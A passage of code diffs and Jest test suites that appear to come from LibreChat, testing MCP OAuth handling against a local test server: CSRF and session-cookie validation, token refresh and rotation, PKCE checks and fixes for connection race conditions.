expect(cb.failedBackoffUntil).toBe(0);
});
});
describe('clearCooldown (registry deletion)', () => {
it('should allow connections after clearing circuit breaker state', () => {
const now = Date.now();
jest.setSystemTime(now);
const registry = new Map<string, CircuitBreakerState>();
const serverName = 'test-server';
const cb = createCB();
registry.set(serverName, cb);
for (let i = 0; i < CB_MAX_CYCLES; i++) {
recordCycle(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
registry.delete(serverName);
const newCb = createCB();
expect(isCircuitOpen(newCb)).toBe(false);
});
});
});


@@ -207,6 +207,7 @@ describe('MCPConnection Agent lifecycle streamable-http', () => {
  });

  afterEach(async () => {
+    MCPConnection.clearCooldown('test');
    await safeDisconnect(conn);
    conn = null;
    jest.restoreAllMocks();
@@ -366,6 +367,7 @@ describe('MCPConnection Agent lifecycle SSE', () => {
  });

  afterEach(async () => {
+    MCPConnection.clearCooldown('test-sse');
    await safeDisconnect(conn);
    conn = null;
    jest.restoreAllMocks();
@@ -453,6 +455,7 @@ describe('Regression: old per-request Agent pattern leaks agents', () => {
  });

  afterEach(async () => {
+    MCPConnection.clearCooldown('test-regression');
    await safeDisconnect(conn);
    conn = null;
    jest.restoreAllMocks();
@@ -675,6 +678,7 @@ describe('MCPConnection SSE GET stream recovery integration', () => {
  });

  afterEach(async () => {
+    MCPConnection.clearCooldown('test-sse-recovery');
    await safeDisconnect(conn);
    conn = null;
    jest.restoreAllMocks();


@@ -275,7 +275,7 @@ describe('MCPConnectionFactory', () => {
      expect(mockFlowManager.initFlow).toHaveBeenCalledWith(
        'flow123',
        'mcp_oauth',
-        mockFlowData.flowMetadata,
+        expect.objectContaining(mockFlowData.flowMetadata),
      );
      const initCallOrder = mockFlowManager.initFlow.mock.invocationCallOrder[0];
      const oauthStartCallOrder = (oauthOptions.oauthStart as jest.Mock).mock
@@ -550,7 +550,7 @@ describe('MCPConnectionFactory', () => {
      expect(mockFlowManager.initFlow).toHaveBeenCalledWith(
        'flow123',
        'mcp_oauth',
-        mockFlowData.flowMetadata,
+        expect.objectContaining(mockFlowData.flowMetadata),
      );
      const initCallOrder = mockFlowManager.initFlow.mock.invocationCallOrder[0];
      const oauthStartCallOrder = (oauthOptions.oauthStart as jest.Mock).mock


@@ -0,0 +1,232 @@
/**
* Tests for the OAuth callback CSRF fallback logic.
*
* The callback route validates requests via three mechanisms (in order):
* 1. CSRF cookie (HMAC-based, set during initiate)
* 2. Session cookie (bound to authenticated userId)
* 3. Active PENDING flow in FlowStateManager (fallback for SSE/chat flows)
*
 * This suite tests mechanism 3, the PENDING flow fallback, including
 * staleness enforcement and rejection of non-PENDING flows.
*
* These tests exercise the validation functions directly for fast,
* focused coverage. Route-level integration tests using supertest
* are in api/server/routes/__tests__/mcp.spec.js ("CSRF fallback
* via active PENDING flow" describe block).
*/
import { Keyv } from 'keyv';
import { FlowStateManager, PENDING_STALE_MS } from '~/flow/manager';
import type { Request, Response } from 'express';
import {
generateOAuthCsrfToken,
OAUTH_SESSION_COOKIE,
validateOAuthSession,
OAUTH_CSRF_COOKIE,
validateOAuthCsrf,
} from '~/oauth/csrf';
import { MockKeyv } from './helpers/oauthTestServer';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
const CSRF_COOKIE_PATH = '/api/mcp';
function makeReq(cookies: Record<string, string> = {}): Request {
return { cookies } as unknown as Request;
}
function makeRes(): Response {
const res = {
clearCookie: jest.fn(),
} as unknown as Response;
return res;
}
/**
* Replicate the callback route's three-tier validation logic.
* Returns which mechanism (if any) authorized the request.
*/
async function validateCallback(
req: Request,
res: Response,
flowId: string,
flowManager: FlowStateManager,
): Promise<'csrf' | 'session' | 'pendingFlow' | false> {
const flowUserId = flowId.split(':')[0];
const hasCsrf = validateOAuthCsrf(req, res, flowId, CSRF_COOKIE_PATH);
if (hasCsrf) {
return 'csrf';
}
const hasSession = validateOAuthSession(req, flowUserId);
if (hasSession) {
return 'session';
}
const pendingFlow = await flowManager.getFlowState(flowId, 'mcp_oauth');
const pendingAge = pendingFlow?.createdAt ? Date.now() - pendingFlow.createdAt : Infinity;
if (pendingFlow?.status === 'PENDING' && pendingAge < PENDING_STALE_MS) {
return 'pendingFlow';
}
return false;
}
describe('OAuth Callback CSRF Fallback', () => {
let flowManager: FlowStateManager;
beforeEach(() => {
process.env.JWT_SECRET = 'test-secret-for-csrf';
const store = new MockKeyv();
flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 300000, ci: true });
});
afterEach(() => {
delete process.env.JWT_SECRET;
jest.clearAllMocks();
});
describe('CSRF cookie validation (mechanism 1)', () => {
it('should accept valid CSRF cookie', async () => {
const flowId = 'user1:test-server';
const csrfToken = generateOAuthCsrfToken(flowId, 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_CSRF_COOKIE]: csrfToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('csrf');
});
it('should reject invalid CSRF cookie', async () => {
const flowId = 'user1:test-server';
const req = makeReq({ [OAUTH_CSRF_COOKIE]: 'wrong-token-value' });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
});
describe('Session cookie validation (mechanism 2)', () => {
it('should accept valid session cookie when CSRF is absent', async () => {
const flowId = 'user1:test-server';
const sessionToken = generateOAuthCsrfToken('user1', 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_SESSION_COOKIE]: sessionToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('session');
});
});
describe('PENDING flow fallback (mechanism 3)', () => {
it('should accept when a fresh PENDING flow exists and no cookies are present', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('pendingFlow');
});
it('should reject when no PENDING flow, no CSRF cookie, and no session cookie', async () => {
const flowId = 'user1:test-server';
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should reject when only a COMPLETED flow exists (not PENDING)', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
await flowManager.completeFlow(flowId, 'mcp_oauth', { access_token: 'tok' } as never);
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should reject when only a FAILED flow exists', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
await flowManager.failFlow(flowId, 'mcp_oauth', 'some error');
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should reject when PENDING flow is stale (older than PENDING_STALE_MS)', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
// Artificially age the flow past the staleness threshold
const store = (flowManager as unknown as { keyv: { get: (k: string) => Promise<unknown> } })
.keyv;
const flowState = (await store.get(`mcp_oauth:${flowId}`)) as { createdAt: number };
flowState.createdAt = Date.now() - PENDING_STALE_MS - 1000;
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should accept PENDING flow that is just under the staleness threshold', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
// Flow was just created, well under threshold
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('pendingFlow');
});
});
describe('Priority ordering', () => {
it('should prefer CSRF cookie over PENDING flow', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
const csrfToken = generateOAuthCsrfToken(flowId, 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_CSRF_COOKIE]: csrfToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('csrf');
});
it('should prefer session cookie over PENDING flow when CSRF is absent', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
const sessionToken = generateOAuthCsrfToken('user1', 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_SESSION_COOKIE]: sessionToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('session');
});
});
});


@@ -0,0 +1,268 @@
/**
* Tests for MCPConnection OAuth event cycle against a real OAuth-gated MCP server.
*
* Verifies: oauthRequired emission on 401, oauthHandled reconnection,
* oauthFailed rejection, timeout behavior, and token expiry mid-session.
*/
import { MCPConnection } from '~/mcp/connection';
import { createOAuthMCPServer } from './helpers/oauthTestServer';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
jest.mock('~/auth', () => ({
createSSRFSafeUndiciConnect: jest.fn(() => undefined),
resolveHostnameSSRF: jest.fn(async () => false),
}));
jest.mock('~/mcp/mcpConfig', () => ({
mcpConfig: { CONNECTION_CHECK_TTL: 0, USER_CONNECTION_IDLE_TIMEOUT: 30 * 60 * 1000 },
}));
async function safeDisconnect(conn: MCPConnection | null): Promise<void> {
if (!conn) {
return;
}
try {
await conn.disconnect();
} catch {
// Ignore disconnect errors during cleanup
}
}
async function exchangeCodeForToken(serverUrl: string): Promise<string> {
const authRes = await fetch(`${serverUrl}authorize?redirect_uri=http://localhost&state=test`, {
redirect: 'manual',
});
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${serverUrl}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const data = (await tokenRes.json()) as { access_token: string };
return data.access_token;
}
describe('MCPConnection OAuth Events — Real Server', () => {
let server: OAuthTestServer;
let connection: MCPConnection | null = null;
beforeEach(() => {
MCPConnection.clearCooldown('test-server');
});
afterEach(async () => {
await safeDisconnect(connection);
connection = null;
if (server) {
await server.close();
}
jest.clearAllMocks();
});
describe('oauthRequired event', () => {
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
it('should emit oauthRequired when connecting without a token', async () => {
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: { type: 'streamable-http', url: server.url },
userId: 'user-1',
});
const oauthRequiredPromise = new Promise<{
serverName: string;
error: Error;
serverUrl?: string;
userId?: string;
}>((resolve) => {
connection!.on('oauthRequired', (data) => {
resolve(
data as {
serverName: string;
error: Error;
serverUrl?: string;
userId?: string;
},
);
});
});
// Connection will fail with 401, emitting oauthRequired
const connectPromise = connection.connect().catch(() => {
// Expected to fail since no one handles oauthRequired
});
let raceTimer: NodeJS.Timeout | undefined;
const eventData = await Promise.race([
oauthRequiredPromise,
new Promise<never>((_, reject) => {
raceTimer = setTimeout(
() => reject(new Error('Timed out waiting for oauthRequired')),
10000,
);
}),
]).finally(() => clearTimeout(raceTimer));
expect(eventData.serverName).toBe('test-server');
expect(eventData.error).toBeDefined();
// Emit oauthFailed to unblock connect()
connection.emit('oauthFailed', new Error('test cleanup'));
await connectPromise.catch(() => undefined);
});
it('should not emit oauthRequired when connecting with a valid token', async () => {
const accessToken = await exchangeCodeForToken(server.url);
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: { type: 'streamable-http', url: server.url },
userId: 'user-1',
oauthTokens: {
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens,
});
let oauthFired = false;
connection.on('oauthRequired', () => {
oauthFired = true;
});
await connection.connect();
expect(await connection.isConnected()).toBe(true);
expect(oauthFired).toBe(false);
});
});
describe('oauthHandled reconnection', () => {
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
it('should succeed on retry after oauthHandled provides valid tokens', async () => {
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: {
type: 'streamable-http',
url: server.url,
initTimeout: 15000,
},
userId: 'user-1',
});
// First connect fails with 401 → oauthRequired fires
let oauthFired = false;
connection.on('oauthRequired', () => {
oauthFired = true;
connection!.emit('oauthFailed', new Error('Will retry with tokens'));
});
// First attempt fails as expected
await expect(connection.connect()).rejects.toThrow();
expect(oauthFired).toBe(true);
// Now set valid tokens and reconnect
const accessToken = await exchangeCodeForToken(server.url);
connection.setOAuthTokens({
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
await connection.connect();
expect(await connection.isConnected()).toBe(true);
});
});
describe('oauthFailed rejection', () => {
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
it('should reject connect() when oauthFailed is emitted', async () => {
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: {
type: 'streamable-http',
url: server.url,
initTimeout: 15000,
},
userId: 'user-1',
});
connection.on('oauthRequired', () => {
connection!.emit('oauthFailed', new Error('User denied OAuth'));
});
await expect(connection.connect()).rejects.toThrow();
});
});
describe('Token expiry during session', () => {
it('should detect expired token on reconnect and emit oauthRequired', async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 1000 });
const accessToken = await exchangeCodeForToken(server.url);
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: {
type: 'streamable-http',
url: server.url,
initTimeout: 15000,
},
userId: 'user-1',
oauthTokens: {
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens,
});
// Initial connect should succeed
await connection.connect();
expect(await connection.isConnected()).toBe(true);
await connection.disconnect();
// Wait for token to expire
await new Promise((r) => setTimeout(r, 1200));
// Reconnect should trigger oauthRequired since token is expired on the server
let oauthFired = false;
connection.on('oauthRequired', () => {
oauthFired = true;
connection!.emit('oauthFailed', new Error('Will retry with fresh token'));
});
// First reconnect fails with 401 → oauthRequired
await expect(connection.connect()).rejects.toThrow();
expect(oauthFired).toBe(true);
// Get fresh token and reconnect
const newToken = await exchangeCodeForToken(server.url);
connection.setOAuthTokens({
access_token: newToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
await connection.connect();
expect(await connection.isConnected()).toBe(true);
});
});
});


@@ -0,0 +1,545 @@
/**
* OAuth flow tests against a real HTTP server.
*
* Tests MCPOAuthHandler.refreshOAuthTokens and MCPTokenStorage lifecycle
* using a real test OAuth server (not mocked SDK functions).
*/
import { createHash } from 'crypto';
import { Keyv } from 'keyv';
import { MCPTokenStorage, MCPOAuthHandler } from '~/mcp/oauth';
import { FlowStateManager } from '~/flow/manager';
import { createOAuthMCPServer, MockKeyv, InMemoryTokenStore } from './helpers/oauthTestServer';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
/** Bypass SSRF validation — these tests use real local HTTP servers. */
jest.mock('~/auth', () => ({
...jest.requireActual('~/auth'),
isSSRFTarget: jest.fn(() => false),
resolveHostnameSSRF: jest.fn(async () => false),
}));
describe('MCP OAuth Flow — Real HTTP Server', () => {
afterEach(() => {
jest.clearAllMocks();
});
describe('Token refresh with real server', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
});
afterEach(async () => {
await server.close();
});
it('should refresh tokens with stored client info via real /token endpoint', async () => {
// First get initial tokens
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
refresh_token: string;
};
expect(initial.refresh_token).toBeDefined();
// Register a client so we have clientInfo
const regRes = await fetch(`${server.url}register`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ redirect_uris: ['http://localhost/callback'] }),
});
const clientInfo = (await regRes.json()) as {
client_id: string;
client_secret: string;
};
// Refresh tokens using the real endpoint
const refreshed = await MCPOAuthHandler.refreshOAuthTokens(
initial.refresh_token,
{
serverName: 'test-server',
serverUrl: server.url,
clientInfo: {
...clientInfo,
redirect_uris: ['http://localhost/callback'],
},
},
{},
{
token_url: `${server.url}token`,
client_id: clientInfo.client_id,
client_secret: clientInfo.client_secret,
token_exchange_method: 'DefaultPost',
},
);
expect(refreshed.access_token).toBeDefined();
expect(refreshed.access_token).not.toBe(initial.access_token);
expect(refreshed.token_type).toBe('Bearer');
expect(refreshed.obtained_at).toBeDefined();
});
it('should get new refresh token when server rotates', async () => {
const rotatingServer = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
rotateRefreshTokens: true,
});
try {
const code = await rotatingServer.getAuthCode();
const tokenRes = await fetch(`${rotatingServer.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
refresh_token: string;
};
const refreshed = await MCPOAuthHandler.refreshOAuthTokens(
initial.refresh_token,
{
serverName: 'test-server',
serverUrl: rotatingServer.url,
},
{},
{
token_url: `${rotatingServer.url}token`,
client_id: 'anon',
token_exchange_method: 'DefaultPost',
},
);
expect(refreshed.access_token).not.toBe(initial.access_token);
expect(refreshed.refresh_token).toBeDefined();
expect(refreshed.refresh_token).not.toBe(initial.refresh_token);
} finally {
await rotatingServer.close();
}
});
it('should fail refresh with invalid refresh token', async () => {
await expect(
MCPOAuthHandler.refreshOAuthTokens(
'invalid-refresh-token',
{
serverName: 'test-server',
serverUrl: server.url,
},
{},
{
token_url: `${server.url}token`,
client_id: 'anon',
token_exchange_method: 'DefaultPost',
},
),
).rejects.toThrow();
});
});
describe('OAuth server metadata discovery', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ issueRefreshTokens: true });
});
afterEach(async () => {
await server.close();
});
it('should expose /.well-known/oauth-authorization-server', async () => {
const res = await fetch(`${server.url}.well-known/oauth-authorization-server`);
expect(res.status).toBe(200);
const metadata = (await res.json()) as {
authorization_endpoint: string;
token_endpoint: string;
registration_endpoint: string;
grant_types_supported: string[];
};
expect(metadata.authorization_endpoint).toContain('/authorize');
expect(metadata.token_endpoint).toContain('/token');
expect(metadata.registration_endpoint).toContain('/register');
expect(metadata.grant_types_supported).toContain('authorization_code');
expect(metadata.grant_types_supported).toContain('refresh_token');
});
it('should not advertise refresh_token grant when disabled', async () => {
const noRefreshServer = await createOAuthMCPServer({
issueRefreshTokens: false,
});
try {
const res = await fetch(`${noRefreshServer.url}.well-known/oauth-authorization-server`);
const metadata = (await res.json()) as { grant_types_supported: string[] };
expect(metadata.grant_types_supported).not.toContain('refresh_token');
} finally {
await noRefreshServer.close();
}
});
});
describe('Dynamic client registration', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer();
});
afterEach(async () => {
await server.close();
});
it('should register a client via /register endpoint', async () => {
const res = await fetch(`${server.url}register`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
redirect_uris: ['http://localhost/callback'],
}),
});
expect(res.status).toBe(200);
const client = (await res.json()) as {
client_id: string;
client_secret: string;
redirect_uris: string[];
};
expect(client.client_id).toBeDefined();
expect(client.client_secret).toBeDefined();
expect(client.redirect_uris).toEqual(['http://localhost/callback']);
expect(server.registeredClients.has(client.client_id)).toBe(true);
});
});
describe('End-to-End: store, retrieve, expire, refresh cycle', () => {
it('should perform full token lifecycle with real server', async () => {
const server = await createOAuthMCPServer({
tokenTTLMs: 1000,
issueRefreshTokens: true,
});
const tokenStore = new InMemoryTokenStore();
try {
// 1. Get initial tokens via auth code exchange
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// 2. Store tokens
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'test-srv',
tokens: initial,
createToken: tokenStore.createToken,
});
// 3. Retrieve — should succeed
const valid = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
});
expect(valid).not.toBeNull();
expect(valid!.access_token).toBe(initial.access_token);
expect(valid!.refresh_token).toBe(initial.refresh_token);
// 4. Wait for expiry
await new Promise((r) => setTimeout(r, 1200));
// 5. Retrieve again — should trigger refresh via callback
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const refreshRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!refreshRes.ok) {
throw new Error(`Refresh failed: ${refreshRes.status}`);
}
const data = (await refreshRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token?: string;
};
return {
...data,
obtained_at: Date.now(),
expires_at: Date.now() + data.expires_in * 1000,
};
};
const refreshed = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(refreshed).not.toBeNull();
expect(refreshed!.access_token).not.toBe(initial.access_token);
// 6. Verify the refreshed token works against the server
const mcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${refreshed!.access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(mcpRes.status).toBe(200);
} finally {
await server.close();
}
});
});
describe('completeOAuthFlow via FlowStateManager', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ issueRefreshTokens: true });
});
afterEach(async () => {
await server.close();
});
it('should exchange auth code and complete flow in FlowStateManager', async () => {
const store = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'test-user:test-server';
const code = await server.getAuthCode();
// Initialize the flow with metadata the handler needs
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverUrl: server.url,
clientInfo: {
client_id: 'test-client',
redirect_uris: ['http://localhost/callback'],
},
codeVerifier: 'test-verifier',
metadata: {
token_endpoint: `${server.url}token`,
token_endpoint_auth_methods_supported: ['client_secret_post'],
},
});
// The SDK's exchangeAuthorization wants full OAuth metadata,
// so we'll test the token exchange directly instead of going through
// completeOAuthFlow (which requires full SDK-compatible metadata)
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const tokens = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token?: string;
};
const mcpTokens: MCPOAuthTokens = {
...tokens,
obtained_at: Date.now(),
expires_at: Date.now() + tokens.expires_in * 1000,
};
// Complete the flow
const completed = await flowManager.completeFlow(flowId, 'mcp_oauth', mcpTokens);
expect(completed).toBe(true);
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('COMPLETED');
expect(state?.result?.access_token).toBe(tokens.access_token);
});
it('should fail flow when authorization code is invalid', async () => {
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: 'grant_type=authorization_code&code=invalid-code',
});
expect(tokenRes.status).toBe(400);
const body = (await tokenRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
it('should fail when authorization code is reused', async () => {
const code = await server.getAuthCode();
// First exchange succeeds
const firstRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(firstRes.status).toBe(200);
// Second exchange fails
const secondRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(secondRes.status).toBe(400);
const body = (await secondRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
});
describe('PKCE verification', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
afterEach(async () => {
await server.close();
});
function generatePKCE(): { verifier: string; challenge: string } {
const verifier = 'dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk';
const challenge = createHash('sha256').update(verifier).digest('base64url');
return { verifier, challenge };
}
it('should accept valid code_verifier matching code_challenge', async () => {
const { verifier, challenge } = generatePKCE();
const authRes = await fetch(
`${server.url}authorize?redirect_uri=http://localhost&state=test&code_challenge=${challenge}&code_challenge_method=S256`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}&code_verifier=${verifier}`,
});
expect(tokenRes.status).toBe(200);
const data = (await tokenRes.json()) as { access_token: string };
expect(data.access_token).toBeDefined();
});
it('should reject wrong code_verifier', async () => {
const { challenge } = generatePKCE();
const authRes = await fetch(
`${server.url}authorize?redirect_uri=http://localhost&state=test&code_challenge=${challenge}&code_challenge_method=S256`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}&code_verifier=wrong-verifier`,
});
expect(tokenRes.status).toBe(400);
const body = (await tokenRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
it('should reject missing code_verifier when code_challenge was provided', async () => {
const { challenge } = generatePKCE();
const authRes = await fetch(
`${server.url}authorize?redirect_uri=http://localhost&state=test&code_challenge=${challenge}&code_challenge_method=S256`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(tokenRes.status).toBe(400);
const body = (await tokenRes.json()) as { error: string };
expect(body.error).toBe('invalid_grant');
});
it('should still accept codes without PKCE when no code_challenge was provided', async () => {
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(tokenRes.status).toBe(200);
});
});
});


@@ -0,0 +1,516 @@
/**
* Tests for MCP OAuth race condition fixes:
*
* 1. Connection mutex coalesces concurrent getUserConnection() calls
* 2. PENDING OAuth flows are reused, not deleted
* 3. No-refresh-token expiry throws ReauthenticationRequiredError
* 4. completeFlow recovers when flow state was deleted by a race
* 5. monitorFlow retries once when flow state disappears mid-poll
*/
import { Keyv } from 'keyv';
import { logger } from '@librechat/data-schemas';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
import { MCPTokenStorage, MCPOAuthHandler, ReauthenticationRequiredError } from '~/mcp/oauth';
import { MockKeyv, createOAuthMCPServer } from './helpers/oauthTestServer';
import { FlowStateManager } from '~/flow/manager';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
jest.mock('~/auth', () => ({
createSSRFSafeUndiciConnect: jest.fn(() => undefined),
resolveHostnameSSRF: jest.fn(async () => false),
}));
jest.mock('~/mcp/mcpConfig', () => ({
mcpConfig: { CONNECTION_CHECK_TTL: 0, USER_CONNECTION_IDLE_TIMEOUT: 30 * 60 * 1000 },
}));
const mockLogger = logger as jest.Mocked<typeof logger>;
describe('MCP OAuth Race Condition Fixes', () => {
afterEach(() => {
jest.clearAllMocks();
});
describe('Fix 1: Connection mutex coalesces concurrent attempts', () => {
it('should return the same pending promise for concurrent getUserConnection calls', async () => {
const { UserConnectionManager } = await import('~/mcp/UserConnectionManager');
class TestManager extends UserConnectionManager {
public createCallCount = 0;
getPendingConnections() {
return this.pendingConnections;
}
}
const manager = new TestManager();
const mockConnection = {
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn().mockResolvedValue(undefined),
isStale: jest.fn().mockReturnValue(false),
};
const mockAppConnections = { has: jest.fn().mockResolvedValue(false) };
manager.appConnections = mockAppConnections as never;
const mockConfig = {
type: 'streamable-http',
url: 'http://localhost:9999/',
updatedAt: undefined,
dbId: undefined,
};
jest
